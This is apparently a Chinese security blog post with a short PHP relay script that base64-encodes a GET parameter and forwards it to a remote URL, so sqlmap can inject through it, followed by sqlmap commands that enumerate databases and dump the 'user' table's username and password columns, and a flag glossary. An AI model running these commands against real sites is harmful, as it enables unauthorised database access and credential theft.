<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$url</span><span class="token operator">=</span><span class="token string single-quoted-string">''</span><span class="token punctuation">;</span>
<span class="token variable">$payload</span><span class="token operator">=</span><span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'x'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$payload</span><span class="token punctuation">;</span>
<span class="token variable">$urls</span><span class="token operator">=</span><span class="token variable">$url</span><span class="token operator">.</span><span class="token variable">$payload</span><span class="token punctuation">;</span>
<span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$urls</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$urls</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>sqlmap注入本地脚本地址—-》本地搭建脚本（请求数据自定义编写）访问远程地址</p>
<hr>
<p>获取当前<strong>数据库</strong></p>
<p>sqlmap -u 网址 –forms –batch –current-db</p>
<p>获取gkk库的<strong>表</strong></p>
<p>sqlmap -u 网址 –forms –batch -D gkk –tables</p>
<p>获取user的<strong>列</strong></p>
<p>sqlmap -u 网址 –forms –batch -D gkk -T user –columns</p>
<p>获取账号密码<strong>字段</strong></p>
<p>sqlmap -u 网址 –forms –batch -D gkk -T user -C uname,pwd,vip –dump</p>
<hr>
<p><strong>参数</strong>：</p>
<p>–banner：指纹信息</p>
<p>–batch：使用非交互式扫描，SQLMap将不会询问</p>
<p>–dbs：获取数据库列表</p>
<p>–tables：获取所有的数据表</p>
<p>–columns：获取所有字段(列)</p>
<p>–dump：获取行数据</p>
<p>-D：指定数据库</p>
<p>-T：指定数据表</p>
<p>-C：指定字段，用逗号间隔</p>
<p>–user：当前用户</p>
<p>–current-db：当前数据库</p>
<p>–is-dba：是否为DBA(Database Administrator)</p>
<p>–form 制作表格</p>

  <p><a class="classtest-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a>, <a class="classtest-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a> — 2021年11月23日</p>
  


        </div>
        <div class="row mt-2">
  <h3>Search</h3>
  <div><input id="search-text" title="search" class="search-text" type="text" placeholder="search......"></div>
  <div style="margin-top: 1.5rem;">
    <ul id="result"></ul>
  </div>
</div>
        <div class="row mt-2">
  
    <div class="eight columns">
      <p id="madewith">Made with ❤ and
        <a class="footer-link icon" href="https://hexo.io" target="_blank" style="text-decoration: none;" rel="noreferrer" aria-label="Hexo.io">
        <svg class="hexo svg-hov" width="14" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><title>Hexo.js</title><path d="M12 .007L1.57 6.056V18.05L12 23.995l10.43-6.049V5.952L12 .007zm4.798 17.105l-.939.521-.939-.521V12.94H9.08v4.172l-.94.521-.938-.521V6.89l.939-.521.939.521v4.172h5.84V6.89l.94-.521.938.521v10.222z"/></svg>
        </a>
        
    </div>

    <!-- Sepcial thanks to https://simpleicons.org/ for the icons -->
    <div class="four columns mb-3 posisi" >
      
      <a class="ml-0 footer-link icon" href="https://github.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="GitHub">
        <svg class="github svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
      </a>
      

      

      
      <a class="ml-0 footer-link icon" href="https://twitter.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="Twitter">
        <svg class="twitter svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>Twitter</title><path d="M23.954 4.569c-.885.389-1.83.654-2.825.775 1.014-.611 1.794-1.574 2.163-2.723-.951.555-2.005.959-3.127 1.184-.896-.959-2.173-1.559-3.591-1.559-2.717 0-4.92 2.203-4.92 4.917 0 .39.045.765.127 1.124C7.691 8.094 4.066 6.13 1.64 3.161c-.427.722-.666 1.561-.666 2.475 0 1.71.87 3.213 2.188 4.096-.807-.026-1.566-.248-2.228-.616v.061c0 2.385 1.693 4.374 3.946 4.827-.413.111-.849.171-1.296.171-.314 0-.615-.03-.916-.086.631 1.953 2.445 3.377 4.604 3.417-1.68 1.319-3.809 2.105-6.102 2.105-.39 0-.779-.023-1.17-.067 2.189 1.394 4.768 2.209 7.557 2.209 9.054 0 13.999-7.496 13.999-13.986 0-.209 0-.42-.015-.63.961-.689 1.8-1.56 2.46-2.548l-.047-.02z"/></svg>
      </a>
      

      
      <a class="ml-0 footer-link icon" href="https://instagram.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="Instagram">
        <svg class="instagram svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>Instagram</title><path d="M12 0C8.74 0 8.333.015 7.053.072 5.775.132 4.905.333 4.14.63c-.789.306-1.459.717-2.126 1.384S.935 3.35.63 4.14C.333 4.905.131 5.775.072 7.053.012 8.333 0 8.74 0 12s.015 3.667.072 4.947c.06 1.277.261 2.148.558 2.913.306.788.717 1.459 1.384 2.126.667.666 1.336 1.079 2.126 1.384.766.296 1.636.499 2.913.558C8.333 23.988 8.74 24 12 24s3.667-.015 4.947-.072c1.277-.06 2.148-.262 2.913-.558.788-.306 1.459-.718 2.126-1.384.666-.667 1.079-1.335 1.384-2.126.296-.765.499-1.636.558-2.913.06-1.28.072-1.687.072-4.947s-.015-3.667-.072-4.947c-.06-1.277-.262-2.149-.558-2.913-.306-.789-.718-1.459-1.384-2.126C21.319 1.347 20.651.935 19.86.63c-.765-.297-1.636-.499-2.913-.558C15.667.012 15.26 0 12 0zm0 2.16c3.203 0 3.585.016 4.85.071 1.17.055 1.805.249 2.227.415.562.217.96.477 1.382.896.419.42.679.819.896 1.381.164.422.36 1.057.413 2.227.057 1.266.07 1.646.07 4.85s-.015 3.585-.074 4.85c-.061 1.17-.256 1.805-.421 2.227-.224.562-.479.96-.899 1.382-.419.419-.824.679-1.38.896-.42.164-1.065.36-2.235.413-1.274.057-1.649.07-4.859.07-3.211 0-3.586-.015-4.859-.074-1.171-.061-1.816-.256-2.236-.421-.569-.224-.96-.479-1.379-.899-.421-.419-.69-.824-.9-1.38-.165-.42-.359-1.065-.42-2.235-.045-1.26-.061-1.649-.061-4.844 0-3.196.016-3.586.061-4.861.061-1.17.255-1.814.42-2.234.21-.57.479-.96.9-1.381.419-.419.81-.689 1.379-.898.42-.166 1.051-.361 2.221-.421 1.275-.045 1.65-.06 4.859-.06l.045.03zm0 3.678c-3.405 0-6.162 2.76-6.162 6.162 0 3.405 2.76 6.162 6.162 6.162 3.405 0 6.162-2.76 6.162-6.162 0-3.405-2.76-6.162-6.162-6.162zM12 16c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4zm7.846-10.405c0 .795-.646 1.44-1.44 1.44-.795 0-1.44-.646-1.44-1.44 0-.794.646-1.439 1.44-1.439.793-.001 1.44.645 1.44 1.439z"/></svg>
      </a>
      

      

    </div>
  
</div>
<script src="/js/prism/prism.js" async></script>
      </div>

    </div>

  </div>
  <script src="/js/nanobar.min.js"></script>

  <script>
    var options = {
      classname: 'nanobar',
      id: 'myNanobar'
    };
    var nanobar = new Nanobar(options);
    nanobar.go(30);
    nanobar.go(76);
    nanobar.go(100);
  </script>

</body>

</html>